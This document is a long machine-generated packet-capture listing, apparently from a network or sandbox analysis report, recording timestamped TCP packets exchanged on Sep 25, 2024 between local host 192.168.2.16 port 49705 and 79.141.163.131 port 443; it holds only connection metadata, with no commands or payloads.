                                                                              Sep 25, 2024 19:02:35.883019924 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883042097 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883343935 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883431911 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883447886 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883464098 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883500099 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883522034 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883796930 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883860111 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883892059 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883903980 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883939028 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883955956 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.886734962 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.886792898 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.886826992 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.886840105 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.886866093 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.886914015 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.958338022 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.958422899 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.958457947 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.958475113 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.958506107 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.958556890 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.960194111 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.960266113 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.960292101 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.960305929 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.960350990 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.960371971 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.965718031 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.965744019 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.965802908 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.965816021 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.965847015 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.965878010 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.967889071 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.967921972 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.967972040 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.967987061 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.968023062 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.968063116 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.974390984 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.974411011 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.974476099 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.974488974 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.974531889 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.974575996 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.975275993 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.975300074 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.975370884 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.975402117 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.975462914 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.977154016 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.977174044 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.977227926 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.977241039 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.977274895 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.977314949 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.979543924 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.979563951 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.979628086 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.979643106 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.979669094 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.979711056 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.058710098 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.058737993 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.058801889 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.058835983 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.058867931 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.058907986 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.059135914 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.059155941 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.059226990 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.059235096 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.059297085 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.059416056 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.059434891 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.059504032 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.059511900 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.059566021 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.060226917 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.060251951 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.060334921 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.060342073 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.060355902 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.060394049 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.076936960 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.076966047 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.077028036 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.077084064 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.077119112 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.077152967 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.077485085 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.077507973 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.077574968 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.077590942 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.077658892 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.078013897 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.078036070 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.078104973 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.078119040 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.078190088 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.078248024 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.078268051 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.078325987 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.078337908 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.078370094 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.078404903 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.134385109 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.134412050 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.134490013 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.134557962 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.134649038 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.134691000 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.135952950 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.135974884 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.136043072 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.136068106 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.136143923 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.143636942 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.143659115 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.143732071 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.143773079 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.143838882 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.146013975 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.146033049 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.146116018 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.146153927 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.146220922 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.164097071 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.164129972 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.164196968 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.164264917 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.164304972 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.164326906 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.164530993 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.164557934 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.164618015 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.164635897 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.164665937 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.164699078 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.164908886 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.164940119 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.165004969 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.165021896 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.165071011 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.165092945 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.166224957 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.166245937 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.166311979 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.166333914 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.166397095 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.221337080 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.221364975 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.221453905 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.221519947 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.221556902 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.221592903 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.222896099 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.222918987 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.222970963 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.222985983 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:36.223016024 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:36.223046064 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.281034946 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.281048059 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.281142950 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.281168938 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.281244993 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.281285048 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.281320095 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.281451941 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.281467915 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.281547070 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.281563997 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.281631947 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.281842947 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.281867981 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.281996012 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.282011032 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.282077074 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.282712936 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.282728910 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.282854080 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.282867908 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.282939911 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.283122063 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.283135891 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.283221006 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.283233881 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.283301115 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.285866976 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.285885096 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.286045074 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.286060095 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.286132097 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.286278009 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.286292076 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.286371946 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.286386013 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.286453009 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.287924051 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.287940025 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.288022995 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.288037062 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.288125038 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.288285017 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.288299084 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.288377047 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.288391113 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.288465023 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.290046930 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.290061951 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.290144920 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.290158987 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.290309906 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.290456057 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.290474892 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.290553093 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.290565968 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.290637016 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.290988922 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.291003942 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.291083097 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.291098118 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.291167021 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.291399002 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.291414022 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.291495085 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.291510105 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.291579962 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.294583082 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.294599056 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.294725895 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.294743061 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.294831991 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.295016050 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.295030117 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.295111895 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.295125961 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.295193911 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.295483112 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.295504093 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.295675993 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.295690060 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.295763016 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.295874119 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.295888901 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.295967102 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.295980930 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.296047926 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.298561096 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.298583984 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.298661947 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.298676014 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.298779011 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.611975908 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.611984968 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.612066031 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.612088919 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.612128019 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.612164974 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.612209082 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.613509893 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.613527060 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.613600969 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.613615990 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.613672972 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.613883972 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.613900900 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.613972902 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.614001989 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614068031 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.614339113 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614355087 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614430904 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.614444971 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614514112 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.614739895 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614754915 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614844084 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.614857912 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614927053 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.618299961 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.618315935 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.618391991 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.618407011 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.618475914 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.618859053 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.618877888 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.618956089 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.618969917 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.619038105 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.620079041 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620094061 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620176077 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.620189905 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620259047 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.620552063 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620567083 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620646954 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.620661020 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620728970 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.623580933 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.623594999 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.623673916 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.623688936 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.623771906 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.624115944 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624130011 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624228954 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.624243975 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624314070 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.624526024 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624540091 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624630928 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.624645948 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624712944 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.624954939 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624972105 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.625056028 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.625070095 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.625139952 CEST49705443192.168.2.1679.141.163.131
